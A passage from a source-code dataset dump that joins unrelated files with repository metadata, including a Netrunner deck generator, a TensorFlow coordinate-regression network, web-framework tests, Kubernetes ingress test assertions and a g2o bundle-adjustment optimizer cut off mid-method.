# {"feature": "Education", "instances": 7, "metric_value": 0.5917, "depth": 4}
if obj[1]>0:
return 'True'
elif obj[1]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[2]>12:
return 'False'
else: return 'False'
elif obj[0]<=0:
return 'False'
else: return 'False'
| 32.5 | 95 | 0.583516 |
6f16e1f596ec434153c8907b3eb7296db741a474 | 4,270 | py | Python | modules/deckbuilder.py | Nynergy/escher | cae055c1a11402f47ee577747985cf85b041ee0d | [
"MIT"
] | 1 | 2021-12-12T18:39:07.000Z | 2021-12-12T18:39:07.000Z | modules/deckbuilder.py | Nynergy/escher | cae055c1a11402f47ee577747985cf85b041ee0d | [
"MIT"
] | null | null | null | modules/deckbuilder.py | Nynergy/escher | cae055c1a11402f47ee577747985cf85b041ee0d | [
"MIT"
] | null | null | null | import random
from classes.Deck import RunnerDeck, CorpDeck
def generate_deck(args, card_pool):
if args['side'] == 'runner':
return generate_runner_deck(args, card_pool)
else:
return generate_corp_deck(args, card_pool)
def generate_runner_deck(args, card_pool):
identity = random_identity(args, card_pool)
deck = RunnerDeck(identity)
non_id_cards = [ c for c in card_pool if c['type_code'] != 'identity' ]
if args['guaranteed_econ']:
gamble = next(card for card in non_id_cards if card['title'] == 'Sure Gamble')
non_id_cards.remove(gamble)
for i in range(gamble['deck_limit']):
deck.addCard(gamble, False)
if args['guaranteed_types']:
types = ['Fracter', 'Decoder', 'Killer']
for breaker_type in types:
random.shuffle(non_id_cards)
icebreaker = next(card for card in non_id_cards if 'keywords' in card
and breaker_type in card['keywords'])
non_id_cards.remove(icebreaker)
deck.addCard(icebreaker, icebreaker['faction_code'] == deck.identity['faction_code'])
deck = fill_deck(deck, non_id_cards)
return deck
def random_identity(args, card_pool):
faction = args['faction']
if faction:
faction = [faction] if faction != 'minifaction' else ['adam', 'apex', 'sunny-lebeau']
identities = [ i for i in card_pool if i['type_code'] == 'identity'
and i['faction_code'] in faction ]
else:
identities = [ i for i in card_pool if i['type_code'] == 'identity' ]
random.shuffle(identities)
identity = identities.pop()
return identity
def fill_deck(deck, card_pool):
# Keep adding cards as long as minimum size hasn't been reached
while deck.current_deck_size < deck.min_deck_size:
random.shuffle(card_pool)
card = card_pool.pop()
number_to_add = random.randint(1, card['deck_limit'])
for i in range(number_to_add):
deck.addCard(card, card['faction_code'] == deck.identity['faction_code'])
return deck
def generate_corp_deck(args, card_pool):
identity = random_identity(args, card_pool)
deck = CorpDeck(identity)
# Add agendas to the deck before anything else
valid_factions = [identity['faction_code'], 'neutral-corp']
agendas = [ a for a in card_pool if a['type_code'] == 'agenda'
and a['faction_code'] in valid_factions ]
deck = fill_agendas(deck, agendas)
other_cards = [ c for c in card_pool if c['type_code'] not in ['identity', 'agenda'] ]
if args['guaranteed_econ']:
hedge = next(card for card in other_cards if card['title'] == 'Hedge Fund')
other_cards.remove(hedge)
for i in range(hedge['deck_limit']):
deck.addCard(hedge, False)
if args['guaranteed_types']:
types = ['Barrier', 'Code Gate', 'Sentry']
for ice_type in types:
random.shuffle(other_cards)
ice = next(card for card in other_cards if 'keywords' in card
and ice_type in card['keywords'])
other_cards.remove(ice)
deck.addCard(ice, ice['faction_code'] == deck.identity['faction_code'])
num_ice = 0
while num_ice < args['minimum_ice']:
random.shuffle(other_cards)
ice = next(card for card in other_cards if card['type_code'] == 'ice')
other_cards.remove(ice)
number_to_add = random.randint(1, ice['deck_limit'])
for i in range(number_to_add):
add_success = deck.addCard(ice, ice['faction_code'] == deck.identity['faction_code'])
if add_success:
num_ice += 1
deck = fill_deck(deck, other_cards)
return deck
def fill_agendas(deck, card_pool):
# Add agendas until we are in our point range
point_range = deck.agenda_point_range
while deck.current_agenda_points < point_range[0]:
random.shuffle(card_pool)
agenda = card_pool.pop()
number_to_add = random.randint(1, agenda['deck_limit'])
for i in range(number_to_add):
deck.addAgenda(agenda)
return deck
| 36.495726 | 97 | 0.622248 |
ef982fba932d8fdf8b504b5687b06ca4ee6eafb6 | 1,673 | py | Python | cnn_wrapper/SCoordNet.py | somanyunknowns/KFNet | f0afda975211698f4689f295373df9a2d3660a47 | [
"MIT"
] | 202 | 2020-03-17T06:18:11.000Z | 2022-03-08T06:13:21.000Z | cnn_wrapper/SCoordNet.py | somanyunknowns/KFNet | f0afda975211698f4689f295373df9a2d3660a47 | [
"MIT"
] | 7 | 2020-04-10T00:46:42.000Z | 2021-06-30T00:07:06.000Z | cnn_wrapper/SCoordNet.py | somanyunknowns/KFNet | f0afda975211698f4689f295373df9a2d3660a47 | [
"MIT"
] | 27 | 2020-04-09T21:53:27.000Z | 2022-03-16T08:26:41.000Z | from cnn_wrapper.network import Network, layer
import tensorflow as tf
class SCoordNet(Network):
def __init__(self, inputs, is_training, focal_x, focal_y, u, v, dropout_rate=0.5, seed=None, reuse=False):
Network.__init__(self, inputs, is_training, dropout_rate, seed, reuse)
self.focal_x = focal_x
self.focal_y = focal_y
self.u = u
self.v = v
images = inputs['input']
shape = images.get_shape().as_list()
self.batch_size = shape[0]
self.height = shape[1]
self.width = shape[2]
def setup(self):
(self.feed('input')
.preprocess(name='preprocess')
.conv(3, 64, 1, name='conv1a')
.conv(3, 64, 1, name='conv1b')
.conv(3, 256, 2, name='conv2a')
.conv(3, 256, 1, name='conv2b')
.conv(3, 512, 2, name='conv3a')
.conv(3, 512, 1, name='conv3b')
.conv(3, 1024, 2, name='conv4a')
.conv(3, 1024, 1, name='conv4b')
.conv(3, 512, 1, name='conv5')
.conv(3, 256, 1, name='conv6')
.conv(1, 128, 1, name='conv7')
.conv(1, 4, 1, relu=False, name='prediction'))
@layer
def preprocess(self, input, name):
input = tf.multiply(tf.subtract(input, 128.0), 0.00625, name=name)
return input
def GetOutput(self):
prediction = self.get_output_by_name('prediction')
coord_map = tf.slice(prediction, [0, 0, 0, 0], [-1, -1, -1, 3], name='coord')
uncertainty_map = tf.slice(prediction, [0, 0, 0, 3], [-1, -1, -1, 1], name='uncertainty')
uncertainty_map = tf.exp(uncertainty_map)
return coord_map, uncertainty_map
| 31.566038 | 110 | 0.572026 |
e931329cd90cbd5a7988895ca68721eb47f95034 | 1,087 | py | Python | tests/features/hashid/test_hashid_middleware.py | cercos/masonite | f7f220efa7fae833683e9f07ce13c3795a87d3b8 | [
"MIT"
] | 1,816 | 2018-02-14T01:59:51.000Z | 2022-03-31T17:09:20.000Z | tests/features/hashid/test_hashid_middleware.py | cercos/masonite | f7f220efa7fae833683e9f07ce13c3795a87d3b8 | [
"MIT"
] | 340 | 2018-02-11T00:27:26.000Z | 2022-03-21T12:00:24.000Z | tests/features/hashid/test_hashid_middleware.py | cercos/masonite | f7f220efa7fae833683e9f07ce13c3795a87d3b8 | [
"MIT"
] | 144 | 2018-03-18T00:08:16.000Z | 2022-02-26T01:51:58.000Z | from src.masonite.essentials.middleware import HashIDMiddleware
from src.masonite.essentials.helpers.hashid import hashid
from tests import TestCase
class TestHashID(TestCase):
def test_hashid_hashes_integer(self):
assert hashid(10) == "l9avmeG"
def test_hashid_hashes_several_integers(self):
assert hashid(10, 20, 30) == "dB1I1uo"
def test_hashid_decodes_several_integers(self):
assert hashid("B1I1uo", decode=True) == (10, 20, 30)
def test_hashid_decodes_non_encoded_value_is_falsey(self):
assert not hashid("B8I6ub", decode=True)
def test_hashid_can_decode_dictionary(self):
assert (
hashid(
{
"id": "l9avmeG",
"name": "Joe",
},
decode=True,
)
== {"id": 10, "name": "Joe"}
)
def test_middleware(self):
request = self.make_request(query_string="id=l9avmeG&name=Joe")
HashIDMiddleware().before(request, None)
assert request.all() == {"id": 10, "name": "Joe"}
| 31.057143 | 71 | 0.605336 |
ae3922f0b20af4af29ab6d392c89fc9d81e05871 | 1,185 | py | Python | house/models.py | Redhead95/taskful_api | 2b28a7f6ecaeb1c77d3fd3bea9ae5922667b1044 | [
"MIT"
] | null | null | null | house/models.py | Redhead95/taskful_api | 2b28a7f6ecaeb1c77d3fd3bea9ae5922667b1044 | [
"MIT"
] | null | null | null | house/models.py | Redhead95/taskful_api | 2b28a7f6ecaeb1c77d3fd3bea9ae5922667b1044 | [
"MIT"
] | null | null | null | import os
import uuid
from django.db import models
from django.utils.deconstruct import deconstructible
@deconstructible
class GenerateHouseImagePath(object):
def __init__(self):
pass
def __call__(self, instance, filename):
ext = filename.split('.')[-1]
path = f'houses/{instance.id}/images/'
name = f'main.{ext}'
return os.path.join(path, name)
house_image_path = GenerateHouseImagePath()
class House(models.Model):
id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
name = models.CharField(max_length=120)
image = models.FileField(upload_to=house_image_path, blank=True, null=True)
description = models.TextField()
points = models.IntegerField(default=0)
completed_tasks_count = models.IntegerField(default=0)
notcompleted_tasks_count = models.IntegerField(default=0)
manager = models.OneToOneField('user.profile', on_delete=models.SET_NULL, blank=True, null=True, related_name='managed_house')
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
def __str__(self):
return f'{self.id} | {self.name}'
| 32.916667 | 130 | 0.724895 |
648a84c66f7c657565d633d1eae7935b7bcec342 | 774 | py | Python | samples/openapi3/client/petstore/python-experimental/test/test_foo.py | therockstorm/openapi-generator | 01d0b5d4780ebe2d6025e2b443ec136c6ce16c45 | [
"Apache-2.0"
] | 11,868 | 2018-05-12T02:58:07.000Z | 2022-03-31T21:19:39.000Z | samples/openapi3/client/petstore/python-experimental/test/test_foo.py | therockstorm/openapi-generator | 01d0b5d4780ebe2d6025e2b443ec136c6ce16c45 | [
"Apache-2.0"
] | 9,672 | 2018-05-12T14:25:43.000Z | 2022-03-31T23:59:30.000Z | samples/openapi3/client/petstore/python-experimental/test/test_foo.py | therockstorm/openapi-generator | 01d0b5d4780ebe2d6025e2b443ec136c6ce16c45 | [
"Apache-2.0"
] | 4,776 | 2018-05-12T12:06:08.000Z | 2022-03-31T19:52:51.000Z | # coding: utf-8
"""
OpenAPI Petstore
This spec is mainly for testing Petstore server and contains fake endpoints, models. Please do not use this for any other purpose. Special characters: \" \\ # noqa: E501
The version of the OpenAPI document: 1.0.0
Generated by: https://openapi-generator.tech
"""
import sys
import unittest
import petstore_api
from petstore_api.model.foo import Foo
class TestFoo(unittest.TestCase):
"""Foo unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testFoo(self):
"""Test Foo"""
# FIXME: construct object with mandatory attributes with example values
# model = Foo() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| 20.368421 | 174 | 0.657623 |
862ce7e1b0fa5fa9f0ead5a6a6d0ff08fb9e8d8b | 1,142 | py | Python | configs/ocrnet/ocrnet_hr18_512x512_160k_ade20k.py | Xlinford/mmsegmentation | 8b444de5e6db2af2538a73a93ac75204f5c3bb2f | [
"Apache-2.0"
] | null | null | null | configs/ocrnet/ocrnet_hr18_512x512_160k_ade20k.py | Xlinford/mmsegmentation | 8b444de5e6db2af2538a73a93ac75204f5c3bb2f | [
"Apache-2.0"
] | null | null | null | configs/ocrnet/ocrnet_hr18_512x512_160k_ade20k.py | Xlinford/mmsegmentation | 8b444de5e6db2af2538a73a93ac75204f5c3bb2f | [
"Apache-2.0"
] | null | null | null | _base_ = [
'../_base_/models/ocrnet_hr18.py', '../_base_/datasets/ade20k.py',
'../_base_/default_runtime.py', '../_base_/schedules/schedule_160k.py'
]
norm_cfg = dict(type='SyncBN', requires_grad=True)
model = dict(decode_head=[
dict(
type='FCNHead',
in_channels=[18, 36, 72, 144],
channels=sum([18, 36, 72, 144]),
in_index=(0, 1, 2, 3),
input_transform='resize_concat',
kernel_size=1,
num_convs=1,
concat_input=False,
dropout_ratio=-1,
num_classes=150,
norm_cfg=norm_cfg,
align_corners=False,
loss_decode=dict(
type='CrossEntropyLoss', use_sigmoid=False, loss_weight=0.4)),
dict(
type='OCRHead',
in_channels=[18, 36, 72, 144],
in_index=(0, 1, 2, 3),
input_transform='resize_concat',
channels=512,
ocr_channels=256,
dropout_ratio=-1,
num_classes=150,
norm_cfg=norm_cfg,
align_corners=False,
loss_decode=dict(
type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0)),
])
| 31.722222 | 75 | 0.570928 |
3c236624b72e9e4a853097191fcd5d1fa0bea629 | 946 | py | Python | pokebot/models/dqn.py | nacharya114/pokebot | b9028c86c5ee58178f348c75c39225f7b55507aa | [
"MIT"
] | 1 | 2020-05-20T04:52:24.000Z | 2020-05-20T04:52:24.000Z | pokebot/models/dqn.py | nacharya114/pokebot | b9028c86c5ee58178f348c75c39225f7b55507aa | [
"MIT"
] | null | null | null | pokebot/models/dqn.py | nacharya114/pokebot | b9028c86c5ee58178f348c75c39225f7b55507aa | [
"MIT"
] | null | null | null | #########################
# Author: Neil Acharya
#
# Generic Model Definition
#########################
from tensorflow.keras.layers import Dense, Flatten
from tensorflow.keras.models import Sequential
from ..bots.bot import BotPlayer
class DQNModel:
def __init__(self, player: BotPlayer):
self.player = player
self.model = None
self.setup_model_layers()
def setup_model_layers(self):
self.model = Sequential()
self.model.add(Dense(64, activation="elu", input_shape=(1, self.player.state_engine.shape,)))
# Our embedding have shape (1, 10), which affects our hidden layer dimension and output dimension
# Flattening resolve potential issues that would arise otherwise
self.model.add(Flatten())
self.model.add(Dense(64, activation="relu"))
self.model.add(Dense(len(self.player.action_space()), activation="linear"))
| 29.5625 | 106 | 0.634249 |
0615cce7232f7de1e29926298041520146298486 | 9,290 | py | Python | tests/suite/custom_assertions.py | Taymindis/kubernetes-ingress | 28d02e476455b2fd9ac9446cdff06749642ddb0c | [
"Apache-2.0"
] | 3,803 | 2016-03-10T14:33:39.000Z | 2022-03-31T20:01:58.000Z | tests/suite/custom_assertions.py | Taymindis/kubernetes-ingress | 28d02e476455b2fd9ac9446cdff06749642ddb0c | [
"Apache-2.0"
] | 1,159 | 2016-03-10T15:22:26.000Z | 2022-03-31T13:20:57.000Z | tests/suite/custom_assertions.py | Taymindis/kubernetes-ingress | 28d02e476455b2fd9ac9446cdff06749642ddb0c | [
"Apache-2.0"
] | 1,793 | 2016-03-12T15:17:09.000Z | 2022-03-31T02:00:55.000Z | """Describe the custom assertion methods"""
import time
import pytest
import requests
from suite.vs_vsr_resources_utils import get_vs_nginx_template_conf
from suite.resources_utils import get_events
def assert_no_new_events(old_list, new_list):
assert len(old_list) == len(new_list), "Expected: lists are of the same size"
for i in range(len(new_list) - 1, -1, -1):
if old_list[i].count != new_list[i].count:
pytest.fail(f"Expected: no new events. There is a new event found:\"{new_list[i].message}\". Exiting...")
def assert_event_count_increased(event_text, count, events_list) -> None:
"""
Search for the event in the list and verify its counter is more than the expected value.
:param event_text: event text
:param count: expected value
:param events_list: list of events
:return:
"""
for i in range(len(events_list) - 1, -1, -1):
if event_text in events_list[i].message:
assert events_list[i].count > count
return
pytest.fail(f"Failed to find the event \"{event_text}\" in the list. Exiting...")
def assert_event_and_count(event_text, count, events_list) -> None:
"""
Search for the event in the list and compare its counter with an expected value.
:param event_text: event text
:param count: expected value
:param events_list: list of events
:return:
"""
for i in range(len(events_list) - 1, -1, -1):
if event_text in events_list[i].message:
assert events_list[i].count == count
return
pytest.fail(f"Failed to find the event \"{event_text}\" in the list. Exiting...")
def assert_event_with_full_equality_and_count(event_text, count, events_list) -> None:
"""
Search for the event in the list and compare its counter with an expected value.
:param event_text: event text
:param count: expected value
:param events_list: list of events
:return:
"""
for i in range(len(events_list) - 1, -1, -1):
# some events have trailing whitespace
message_stripped = events_list[i].message.rstrip()
if event_text == message_stripped:
assert events_list[i].count == count
return
pytest.fail(f"Failed to find the event \"{event_text}\" in the list. Exiting...")
def assert_event_and_get_count(event_text, events_list) -> int:
"""
Search for the event in the list and return its counter.
:param event_text: event text
:param events_list: list of events
:return: event.count
"""
for i in range(len(events_list) - 1, -1, -1):
if event_text in events_list[i].message:
return events_list[i].count
pytest.fail(f"Failed to find the event \"{event_text}\" in the list. Exiting...")
def get_event_count(event_text, events_list) -> int:
"""
Search for the event in the list and return its counter.
:param event_text: event text
:param events_list: list of events
:return: (int)
"""
for i in range(len(events_list) - 1, -1, -1):
if event_text in events_list[i].message:
return events_list[i].count
pytest.fail(f"Failed to find the event \"{event_text}\" in the list. Exiting...")
def wait_for_event_count_increases(kube_apis, event_text, initial_count, events_namespace) -> None:
"""
Wait for the event counter to get bigger than the initial value.
:param kube_apis: KubeApis
:param event_text: event text
:param initial_count: expected value
:param events_namespace: namespace to fetch events
:return:
"""
events_list = get_events(kube_apis.v1, events_namespace)
count = get_event_count(event_text, events_list)
counter = 0
while count <= initial_count and counter < 4:
time.sleep(1)
counter = counter + 1
events_list = get_events(kube_apis.v1, events_namespace)
count = get_event_count(event_text, events_list)
assert count > initial_count, f"After several seconds the event counter has not increased \"{event_text}\""
def assert_response_codes(resp_1, resp_2, code_1=200, code_2=200) -> None:
"""
Assert responses status codes.
:param resp_1: Response
:param resp_2: Response
:param code_1: expected status code
:param code_2: expected status code
:return:
"""
assert resp_1.status_code == code_1
assert resp_2.status_code == code_2
def assert_event(event_text, events_list) -> None:
"""
Search for the event in the list.
:param event_text: event text
:param events_list: list of events
:return:
"""
for i in range(len(events_list) - 1, -1, -1):
if event_text in events_list[i].message:
return
pytest.fail(f"Failed to find the event \"{event_text}\" in the list. Exiting...")
def assert_event_starts_with_text_and_contains_errors(event_text, events_list, fields_list) -> None:
"""
Search for the event starting with the expected text in the list and check its message.
:param event_text: event text
:param events_list: list of events
:param fields_list: expected message contents
:return:
"""
for i in range(len(events_list) -1, -1, -1):
if str(events_list[i].message).startswith(event_text):
for field_error in fields_list:
assert field_error in events_list[i].message
return
pytest.fail(f"Failed to find the event starting with \"{event_text}\" in the list. Exiting...")
def assert_vs_conf_not_exists(kube_apis, ic_pod_name, ic_namespace, virtual_server_setup):
new_response = get_vs_nginx_template_conf(kube_apis.v1,
virtual_server_setup.namespace,
virtual_server_setup.vs_name,
ic_pod_name,
ic_namespace)
assert "No such file or directory" in new_response
def assert_vs_conf_exists(kube_apis, ic_pod_name, ic_namespace, virtual_server_setup):
new_response = get_vs_nginx_template_conf(kube_apis.v1,
virtual_server_setup.namespace,
virtual_server_setup.vs_name,
ic_pod_name,
ic_namespace)
assert "No such file or directory" not in new_response
def wait_and_assert_status_code(code, req_url, host, **kwargs) -> None:
"""
Wait for a specific response status code.
:param code: status_code
:param req_url: request url
:param host: request headers if any
:paramv **kwargs: optional arguments that ``request`` takes
:return:
"""
counter = 0
resp = requests.get(req_url, headers={"host": host}, **kwargs)
while not resp.status_code == code and counter <= 30:
time.sleep(1)
counter = counter + 1
resp = requests.get(req_url, headers={"host": host}, **kwargs)
assert resp.status_code == code, f"After 30 seconds the status_code is still not {code}"
def assert_grpc_entries_exist(config) -> None:
"""
Assert that the gPRC config entries are present in the config file.
:param config: the nginx config
:return:
"""
assert "grpc_connect_timeout 60s;" in config
assert "grpc_read_timeout 60s;" in config
assert "grpc_send_timeout 60s;" in config
assert "grpc_set_header X-Real-IP $remote_addr;" in config
assert "grpc_set_header X-Forwarded-For $proxy_add_x_forwarded_for;" in config
assert "grpc_set_header X-Forwarded-Host $host;" in config
assert "grpc_set_header X-Forwarded-Port $server_port;" in config
assert "grpc_set_header X-Forwarded-Proto $scheme;" in config
assert 'grpc_set_header Host "$host";' in config
assert "grpc_next_upstream error timeout;" in config
assert "grpc_next_upstream_timeout 0s;" in config
assert "grpc_next_upstream_tries 0;" in config
def assert_proxy_entries_do_not_exist(config) -> None:
"""
Assert that the proxy config entries are not present in the config file.
:param config: the nginx config
:return:
"""
assert "proxy_connect_timeout 60s;" not in config
assert "proxy_read_timeout 60s;" not in config
assert "proxy_send_timeout 60s;" not in config
assert "proxy_set_header Upgrade $http_upgrade;" not in config
assert "proxy_http_version 1.1;" not in config
assert "proxy_next_upstream error timeout;" not in config
assert "proxy_next_upstream_timeout 0s;" not in config
assert "proxy_next_upstream_tries 0;" not in config
def assert_proxy_entries_exist(config) -> None:
"""
Assert that the proxy config entries are present in the config file.
:param config: the nginx config
:return:
"""
assert "proxy_connect_timeout 60s;" in config
assert "proxy_read_timeout 60s;" in config
assert "proxy_send_timeout 60s;" in config
assert "proxy_set_header Upgrade $http_upgrade;" in config
assert "proxy_http_version 1.1;" in config
assert "proxy_next_upstream error timeout;" in config
assert "proxy_next_upstream_timeout 0s;" in config
assert "proxy_next_upstream_tries 0;" in config
| 35.458015 | 117 | 0.669107 |
be93e61f1a9573e5f997abeaf765390a53e1ff13 | 32,948 | py | Python | python/pysvso/optimizers/bundle_adjust.py | mfkiwl/SEMANTIC_VISUAL_SUPPORTED_ODEMETRY | 2249bf358f51b337eb52a347ea7d46bff0654576 | [
"Apache-2.0"
] | 191 | 2020-07-01T11:57:17.000Z | 2022-03-23T12:40:43.000Z | python/pysvso/optimizers/bundle_adjust.py | mfkiwl/SEMANTIC_VISUAL_SUPPORTED_ODEMETRY | 2249bf358f51b337eb52a347ea7d46bff0654576 | [
"Apache-2.0"
] | 10 | 2020-07-06T12:41:51.000Z | 2022-02-09T23:43:11.000Z | python/pysvso/optimizers/bundle_adjust.py | mfkiwl/SEMANTIC_VISUAL_SUPPORTED_ODEMETRY | 2249bf358f51b337eb52a347ea7d46bff0654576 | [
"Apache-2.0"
] | 45 | 2020-07-01T13:31:20.000Z | 2022-02-03T07:21:42.000Z | import os
import sys
try:
# PY.VERSION < 3.6
reduce
except:
# PY.VERSION >= 3.6
from functools import reduce
import numpy as np
import logging
_logger = logging.getLogger("bundle_adjust")
from pysvso.lib.sys import add_path
from pysvso.lib.misc import AtomicCounter
# pwd = os.path.dirname(os.path.realpath(__file__))
# add_path(os.path.join(pwd, '..', 'config'))
# from config import Settings
from pysvso.config import Settings
# print(sys.path)
# add compiled pybind11 binding lib of g2o for python
class OptimizerConfig(Settings):
pass
optimizer_config = OptimizerConfig("pysvso.optimizers.settings")
add_path(optimizer_config.G2OPYLIB_ROOT)
import g2o
# print(dir(g2o))
class Optimizer(g2o.SparseOptimizer):
def __init__(self):
super().__init__()
def vertex_seq_generate(self, entity_name, entity_idx):
v_idx = self.vertex_seq_generator()
vertice = self._ivq.get(entity_name, None)
if vertice is None:
vertice = {}
self._ivq[entity_name] = vertice
vertice[entity_idx] = v_idx
return v_idx
def indexOfVertex(self, entity_name, entity_idx):
vertice = self._ivq.get(entity_name, None)
if vertice is None:
raise Exception("No %s has been registered" % entity_name)
v_idx = vertice.get(entity_idx, None)
if v_idx is None:
raise Exception("Could not find vertex for %s %d" % (entity_name, entity_idx))
return v_idx
def get_pose(self, entity_name, frame_key):
v_idx = self.indexOfVertex(entity_name, frame_key)
pose = self.vertex(v_idx).estimate()
##
pose = pose.inverse()
##
return pose
def get_point(self, entity_name, point_key):
v_idx = self.indexOfVertex(entity_name, point_key)
point = self.vertex(v_idx).estimate()
return point
def edge_seq_generate(self, key):
e_idx = self.edge_seq_generator()
_KEY_NAME = "VERTEX,VERTEX"
edges = self._ieq.get(_KEY_NAME, None)
if edges is None:
edges = {}
self._ieq[_KEY_NAME] = edges
edges[key] = e_idx
return e_idx
def EstimateError(self):
frames = self._map.get_active_frames()
landmarks = self._map.trackList()
pointCloud = self._map.trackPointsList()
rsmes = [None, 0.]
for i, frame in enumerate(frames):
cam = frame.camera
if cam is None:
continue
refined_pose = self.get_pose("Frame", frame.seq)
# @todo : TODO estimate error of poses
for _, point in pointCloud.items():
refined_point = self.get_point("MapPoint", point.seq)
err = point.data- refined_point
rsmes[1] += np.sum(err ** 2)
if self.USE_LANDMARKS:
for _, landmark in landmarks.items():
centroid = landmark.Centroid()
refined_point = self.get_point("MapPoint", centroid.seq)
err = point.data - refined_point
rsmes[1] += np.sum(err ** 2)
pass
pass
if self.USE_LANDMARKS:
rsmes[1] /= float(len(pointCloud) + len(landmarks)) + 1e-3
else:
rsmes[1] /= float(len(pointCloud)) + 1e-3
return rsmes
def UpdateMap(self):
frames = self._map.get_active_frames()
landmarks = self._map.trackList()
pointCloud = self._map.trackPointsList()
for i, frame in enumerate(frames):
cam = frame.camera
if cam is None:
continue
frame.update_pose(self.get_pose("Frame", frame.seq))
for _, point in pointCloud.items():
refined_point = self.get_point("MapPoint", point.seq)
print("refined mappoint %s position:" % point, refined_point)
point.update(*refined_point)
if self.USE_LANDMARKS:
for _, landmark in landmarks.items():
centroid = landmark.Centroid()
refined_point = self.get_point("MapPoint", centroid.seq)
print("refined landmark centroid %s position:" % centroid, refined_point)
centroid.update(*refined_point)
pass
pass
# For the memoment we use g2o for fast development, later we will use our own graph optimizer based
# on SBA algortihm
class BundleAdjustment(Optimizer):
def __init__(self):
super().__init__()
# g2o::BlockSlover_6_3(g2o::BlockSolver_6_3::LinearSolverType*)
linear_solver = g2o.BlockSolverSE3(g2o.LinearSolverCSparseSE3())
solver = g2o.OptimizationAlgorithmLevenberg(linear_solver)
super().set_algorithm(solver)
# additional parameters
#
self._map = None
#
self.vertex_seq_generator = AtomicCounter()
self.edge_seq_generator = AtomicCounter()
# Point | Frame | Landmark -> Vertex mapping
# inverse vertex query
self._ivq = {}
# (Vertex, Vetex) -> Edge mapping, a sparse matrix
# inverse edges query
self._ieq = {}
#
self.USE_LANDMARKS = False
def set_FromMap(self, map):
self._map = map
return self
# def Init(self):
# frames = self._map.get_active_frames()
# landmarks = self._map.trackList()
# pointCloud = self._map.trackPointsList()
#
# # construct graph
# # set key frame as vertices
# for i, frame in enumerate(frames):
# cam = frame.camera
# pose = None
# if cam is None:
# continue
# pose = g2o.SE3Quat(cam.R0, cam.t0.reshape(3, ))
# v_idx = self.vertex_seq_generate("Frame", frame.seq)
# # only set the first frame as stational piont
# # self.add_pose(v_idx, pose, False)#fixed=frame.seq == 1)
#
# # when use ground truth
# self.add_pose(v_idx, pose, fixed=frame.seq == 1)
#
# # set array of MapPoint as vertices
# for _, point in pointCloud.items():
# v = point.data
# v_idx = self.vertex_seq_generate("MapPoint", point.seq)
# self.add_point(v_idx, v, marginalized=True)
#
# # set edges
# observations = point.frames
#
# for frame_key, pixel_pos in observations.items():
# frame = self._map.findFrame(frame_key)
# cam = frame.camera
# if cam is None:
# continue
# key = (v_idx, self.indexOfVertex("Frame", frame_key))
# e_idx = self.edge_seq_generate(key)
#
# # measurement
# px = frame.pixels[pixel_pos]
#
# # @todo: TODO compute invSigma for : see ORBSlam implementation for details
# invSigma = 1.
#
# if not isinstance(key[1], int):
# print("key[1]", key[1])
# raise Exception("Wrong value!")
# edge = self.add_edge(e_idx, key[0], key[1], px.data,
# information=np.identity(2) * invSigma)
#
# # set camera parameters to compute reprojection error with measurements
# cam = frame.camera
# device = cam.device
#
# # modify python/types/sba/type_six_dof_expmap.h#L81
# #
# # Projection using focal_length in x and y directions
# # py::class_<EdgeSE3ProjectXYZ, BaseBinaryEdge<2, Vector2D, VertexSBAPointXYZ, VertexSE3Expmap>>(m, "EdgeSE3ProjectXYZ")
# # .def(py::init<>())
# # .def("compute_error", &EdgeSE3ProjectXYZ::computeError)
# # .def("is_depth_positive", &EdgeSE3ProjectXYZ::isDepthPositive)
# # .def("cam_project", &EdgeSE3ProjectXYZ::cam_project)
# # + .def_readwrite("fx", &EdgeSE3ProjectXYZ::fx)
# # + .def_readwrite("fy", &EdgeSE3ProjectXYZ::fy)
# # + .def_readwrite("cx", &EdgeSE3ProjectXYZ::cx)
# # + .def_readwrite("cy", &EdgeSE3ProjectXYZ::cy)
# # ;
# #
# edge.fx = device.fx
# edge.fy = device.fy
# edge.cx = device.cx
# edge.cy = device.cy
#
# # check our modification is correct: I am not sure whether g2opy runs as expected so we check the result manually.
#
# measurement = edge.cam_project(edge.vertex(1).estimate().map(edge.vertex(0).estimate()))
# print("Measurement: %s" % measurement)
# print("px: %s" % px.data)
# # assert int(measurement[0]) == int(px.x) and int(measurement[1]) == int(px.y)
# pass
#
# if self.USE_LANDMARKS:
# # treat landmark as stationary points group and compute key points from it
# logging.info("Using landmarks for bundle adjustment ...")
# # set landmarks as vertices
# for _, landmark in landmarks.items():
# # representing landmark as top centre point
# logging.info("%s points size %d" % (landmark, len(landmark.points)))
#
# # compute bbox
# # Note: I just use AABB instead of OBB, because to estimate OBB we need dense points
# # bbox = landmark.computeAABB()
# # topCentre = bbox.topCentre()
# # v = topCentre.data
#
# centroid = landmark.Centroid()
# v = centroid.data
# v_idx = self.vertex_seq_generate("MapPoint", centroid.seq)
#
# self.add_point(v_idx, v, marginalized=True)
#
# # estimate measurement
# # we suppose the positions (centers) of landmarks are stable, which will be used in PnP later
# # @todo : TODO
#
# # set edges
# observations = landmark.observations
#
# # choose an estimate pose
# visited_pxes = {}
# for (point_key, frame_seq), pixel_pos in observations.items():
# point = pointCloud[point_key]
# frame = frames[frame_seq]
# cam = frame.camera
# if cam is None:
# continue
#
# px_pose = point[frame_seq]
# px = frame.pixels[pixel_pos]
#
# if visited_pxes.get(frame_seq, None) is None:
# visited_pxes = []
# visited_pxes[frame_seq].append(px.data)
# pass
#
# for frame_seq, projected_pixels in visited_pxes:
# reduced = reduce(lambda pre, cur: pre + cur, projected_pixels)
# reduced /= len(projected_pixels)
# key = (v_idx, self.indexOfVertex("Frame", frame_seq))
# e_idx = self.edge_seq_generate(key)
#
# # @todo: TODO compute invSigma for : see ORBSlam implementation for details
# # I have little idea how this should be set
# invSigma = 1.
#
# edge = self.add_edge(self.vertexPair_edges[key], key[0], key[1], reduced,
# information=np.identity(2) * invSigma)
#
# # set camera parameters to compute reprojection error with measurements
# cam = frame.camera
# device = cam.device
#
# # add camera parameters to compute reprojection errors
# edge.fx = device.fx
# edge.fy = device.fy
# edge.cx = device.cx
# edge.cy = device.cy
#
# pass
# pass
#
# logging.info("Number of vertices:", len(self.vertices()))
# logging.info("Number of edges:", len(self.edges()))
# return self
def Init(self):
frames = self._map.get_active_frames()
landmarks = self._map.trackList()
